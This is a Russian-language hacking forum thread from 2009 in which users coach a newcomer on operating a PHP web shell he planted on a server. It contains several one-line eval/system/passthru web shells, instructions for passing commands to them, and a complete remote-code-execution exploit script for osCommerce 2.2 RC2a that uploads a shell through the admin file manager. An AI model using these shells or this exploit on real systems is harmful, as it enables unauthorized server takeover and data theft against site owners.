ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10061  
Старый 12.11.2009, 15:06
Root-access
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440

Репутация: 648
Отправить сообщение для Root-access с помощью ICQ
По умолчанию

Цитата:
Сообщение от sideup  
Да. Конечно. Но ничего.

Пробовал <?php phpinfo(); ?> работает отлично.

Залил вот это <?php%20@eval(\$_POST[cmd]);?> ошибок

не выдаёт, но что-то не пойму как команды выполнять

shell.php?cmd=id не катит.

Ошибок не выдаёт, потому что перед eval стоит @.
Чтоб команды выполнять, надо отправлять команды через POST. Для этого можно, к примеру, написать форму, а можно пользоваться программой для подделки http-заголовка. Типа InetCrack или HTTPReq
В общем заливай так: <?php eval(\$_GET['cmd']); ?>

Последний раз редактировалось Root-access; 19.01.2010 в 18:31.. Причина: опечатка
 
Ответить с цитированием

  #10062  
Старый 12.11.2009, 15:09
Aртем
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834

Репутация: 90
По умолчанию

Цитата:
Сообщение от sideup  
Да. Конечно. Но ничего.

Пробовал <?php phpinfo(); ?> работает отлично.

Залил вот это <?php%20@eval(\$_POST[cmd]);?> ошибок

не выдаёт, но что-то не пойму как команды выполнять

shell.php?cmd=id не катит.
#10081
 
Ответить с цитированием

  #10063  
Старый 12.11.2009, 15:10
sideup
Новичок
Регистрация: 10.04.2008
Сообщений: 8
Провел на форуме:
20161

Репутация: 0
По умолчанию

Цитата:
Сообщение от L I G A  
переметру cmd передавай пых код
Если не трудно можно пример такого запроса для:

pwd;ls -l
 
Ответить с цитированием

  #10064  
Старый 12.11.2009, 15:13
Aртем
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834

Репутация: 90
По умолчанию

Цитата:
Сообщение от sideup  
Если не трудно можно пример такого запроса для:

pwd;ls -l
в случае с eval() то shell.php?cmd=system(ls -la);
 
Ответить с цитированием

  #10065  
Старый 12.11.2009, 15:13
sideup
Новичок
Регистрация: 10.04.2008
Сообщений: 8
Провел на форуме:
20161

Репутация: 0
По умолчанию

Цитата:
Сообщение от Aртем  
печальный вопрос
Код:
<?system($_GET[cmd])?> 
<?eval($_GET[cmd])?>
<?passthru($_GET[cmd])?>
<?eval($_REQUEST[cmd])?>
<?passthru($_REQUEST[cmd])?>
<?system($_REQUEST[cmd])?>
и да, мне интересно через что ты заливаешь шелл?
если через скулинъект, то как бы ты не сможешь вообще ничего залить если у тебя как ты говоришь ГПЦ=ОН
Не работает из этого ничего.

<?php phpinfo(); ?> работает отлично
 
Ответить с цитированием

  #10066  
Старый 12.11.2009, 15:14
Aртем
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834

Репутация: 90
По умолчанию

Цитата:
Сообщение от sideup  
Не работает из этого ничего.

<?php phpinfo(); ?> работает отлично
ты как бы вопрос там видел? нет? я повторю:
через что ты заливаешь шелл?
[a] - SQL инъекция
[b] - PHP инъкция
[c] - Через какой-нибудь файловый менеджер.
 
Ответить с цитированием

  #10067  
Старый 12.11.2009, 15:20
sideup
Новичок
Регистрация: 10.04.2008
Сообщений: 8
Провел на форуме:
20161

Репутация: 0
По умолчанию

Цитата:
Сообщение от Aртем  
ты как бы вопрос там видел? нет? я повторю:
через что ты заливаешь шелл?
[a] - SQL инъекция
[b] - PHP инъкция
[c] - Через какой-нибудь файловый менеджер.
Вот отсюда взял

http://www.milw0rm.com/exploits/9556
 
Ответить с цитированием

  #10068  
Старый 12.11.2009, 15:25
Aртем
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834

Репутация: 90
По умолчанию

хм... а в чем сложность запустить сплоит?
я его чуть-чуть подправил... но всё же, ты руками что-ли делаешь?
PHP код:
<?php
print_r
('
+---------------------------------------------------------------------------+
osCommerce Online Merchant 2.2 RC2a RCE Exploit
by Flyh4t
mail: phpsec@hotmail.com
team: http://www.wolvez.org
dork: Powered by osCommerce
Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST
Thx to exploits of blackh
+---------------------------------------------------------------------------+
'
);
$host ='domain.com';
$path '/';
$admin_path 'admin/';
$shellcode "filename=fly.php&file_contents=test<?php%20@eval(\$_GET[aifly]);?>";
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd fsockopen($host,'80');
if(!
$fd)
{
    echo 
'[~]No response from'.$host;
    die;
}
fputs($fd,$message);
echo (
"[+]Go to see U webshell : $host/fly.php");
?>
шел будет тут и запускаться так domain.com/fly.php?aifly=[PHP-КОД]
 
Ответить с цитированием

  #10069  
Старый 12.11.2009, 15:26
sideup
Новичок
Регистрация: 10.04.2008
Сообщений: 8
Провел на форуме:
20161

Репутация: 0
По умолчанию

Цитата:
Сообщение от Aртем  
в случае с eval() то shell.php?cmd=system(ls -la);

Не работает
 
Ответить с цитированием

  #10070  
Старый 12.11.2009, 15:33
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Aртем  
я его чуть-чуть подправил...
Угу, ты хакер. Поменял
$host ='democn.51osc.com';
на
$host ='domain.com'; ? Круто!

=====================
sideup

Залей туда
<?php eval(stripslashes($_REQUEST[ev])); ?>
и обратись к скрипту вот так:

shell.php?ev=phpinfo();

=======================
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ